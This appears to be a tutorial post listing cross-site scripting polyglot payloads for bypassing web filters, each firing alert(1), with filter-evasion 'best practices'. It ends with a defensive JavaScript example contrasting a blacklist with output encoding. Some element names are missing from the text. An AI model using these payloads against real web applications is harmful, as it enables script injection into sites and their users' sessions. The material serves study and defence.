Polyglot payloads leverage multiple encoding, injection, and obfuscation techniques to bypass filters, confuse parsers, and trigger execution across different contexts like HTML, JavaScript, CSS, JSON, etc.
-Merging Comment Styles
Polyglots often confuse parsers by merging different comment styles:
JavaScript: //, /* */
HTML: <!-- -->
<!--<script>/*--><svg onload=alert(1)/*</script>-->
-Using Encoded Entities
Bypassing filters using HTML or URL encoding:
HTML: &lt;, &gt;, &quot;
URL: %3C, %3E, %22
<script>alert(1)</script>
-Multiple Language Contexts
Polyglot payloads work across multiple languages like HTML, JavaScript, CSS.
"><svg onload=alert(1) style="background:url(javascript:alert(1))"><!--
-Breaking Out of Contexts
Escape from current contexts like textarea, script, or style.
</textarea><svg onload=alert(1)>
-Abusing HTML5 Elements
Using modern elements like , , or .
<svg onload=alert(1)></svg>
<iframe srcdoc="<svg onload=alert(1)>"></iframe>
<math><mtext><script>alert(1)</script></mtext></math>
-Contextual Event Handlers
Inject event handlers into HTML tags like onload, onmouseover.
<div class="x" onmouseover="alert(1)">
-Combining HTML, JavaScript, and CSS
Mixing contexts of HTML, CSS, and JavaScript.
</style><script>alert(1)</script><style>
-Utilizing SVG and XML Features
SVG allows injection via JavaScript URIs and other XML-based features.
<svg><image href="javascript:alert(1)"></svg>
-Protocol Confusion (Data URLs, JavaScript URLs)
Use javascript: or data: URLs for payload delivery.
<a href="javascript:alert(1)">Click me</a>
<iframe src="data:text/html;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+"></iframe>
-Breaking with Newline Characters
Using newlines \n or carriage returns \r to bypass filters.
"onmouseover=\nalert(1)//"
-Polyglot Structures
Payloads that work across multiple languages like CSS and JavaScript.
*/ alert(1) /*
-UTF-7 Encoding
Using less common encodings like UTF-7.
+ADw-script+AD4-alert(1)+ADw-/script+AD4-
-Using HTML5 Injection Vectors
Use modern HTML5 vectors like srcdoc, formaction, or sandbox.
<iframe srcdoc="<script>alert(1)</script>"></iframe>
-Multiple Closings & Layering
Close different tags to break out of nested contexts.
</textarea></script></iframe><svg onload=alert(1)>
Best Practices for Polyglot Payloads
Diversify Attack Vectors: Use multiple elements like , , <script>.
Encoding: Use HTML or URL encoding to bypass filters.
Event Handlers: Combine with event handlers like onmouseover, onload.
Context Escaping: Focus on breaking out of strings, attributes, or tags.
Minimize Payload Length: Keep payloads short to bypass length restrictions.
These techniques show how polyglot payloads can bypass modern filters by using multiple languages and contexts.
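The defensive counterpart to the list above, as an added example that is not code from the original post: a keyword blacklist of the kind these polyglots are built to slip past, beside context-aware output encoding, run over four of the post's own payloads. It assumes the untrusted string is being written into an HTML text node or a double-quoted attribute value; the helper names are this example's own.

```javascript
// Added example (not from the original post). Blacklist filtering versus
// output encoding for an HTML text-node / quoted-attribute sink.

// A typical keyword blacklist: strip <script> tags and nothing else.
function blacklistFilter(input) {
  return input.replace(/<\/?script[^>]*>/gi, "");
}

// Context-aware encoder: every character that can close the current HTML
// context (tag, attribute, entity) becomes a named or numeric entity, so the
// browser can only ever render the input as text.
function encodeForHtml(input) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return input.replace(/[&<>"']/g, (c) => map[c]);
}

// For a text-node sink the only way into tag context is a raw tag opener
// ("<" followed by a letter, "!" or "/"), so that is what we look for in the
// output of each defence. Event handlers and javascript: URLs need a tag first.
function stillHasTagOpener(output) {
  return /<[a-z!\/]/i.test(output);
}

// Constructed test inputs: payloads quoted verbatim from the post above.
const POLYGLOTS = [
  "<!--<script>/*--><svg onload=alert(1)/*</script>-->",
  "\"><svg onload=alert(1) style=\"background:url(javascript:alert(1))\"><!--",
  "</textarea><svg onload=alert(1)>",
  "<a href=\"javascript:alert(1)\">Click me</a>",
];

// Returns, for one payload, whether each defence leaves live markup behind.
function compare(payload) {
  const filtered = blacklistFilter(payload);
  const encoded = encodeForHtml(payload);
  return {
    filtered,
    encoded,
    blacklistLeavesVector: stillHasTagOpener(filtered),
    encodingLeavesVector: stillHasTagOpener(encoded),
  };
}

for (const p of POLYGLOTS) {
  const r = compare(p);
  console.log(`blacklist live=${r.blacklistLeavesVector} -> ${r.filtered}`);
  console.log(`encoded   live=${r.encodingLeavesVector} -> ${r.encoded}`);
}
```

The first payload shows the mechanism most clearly: once the blacklist removes both script tags, the comment closes at `-->` and the `<svg onload=...>` that follows is still rendered, whereas the encoded form contains no raw `<` at all.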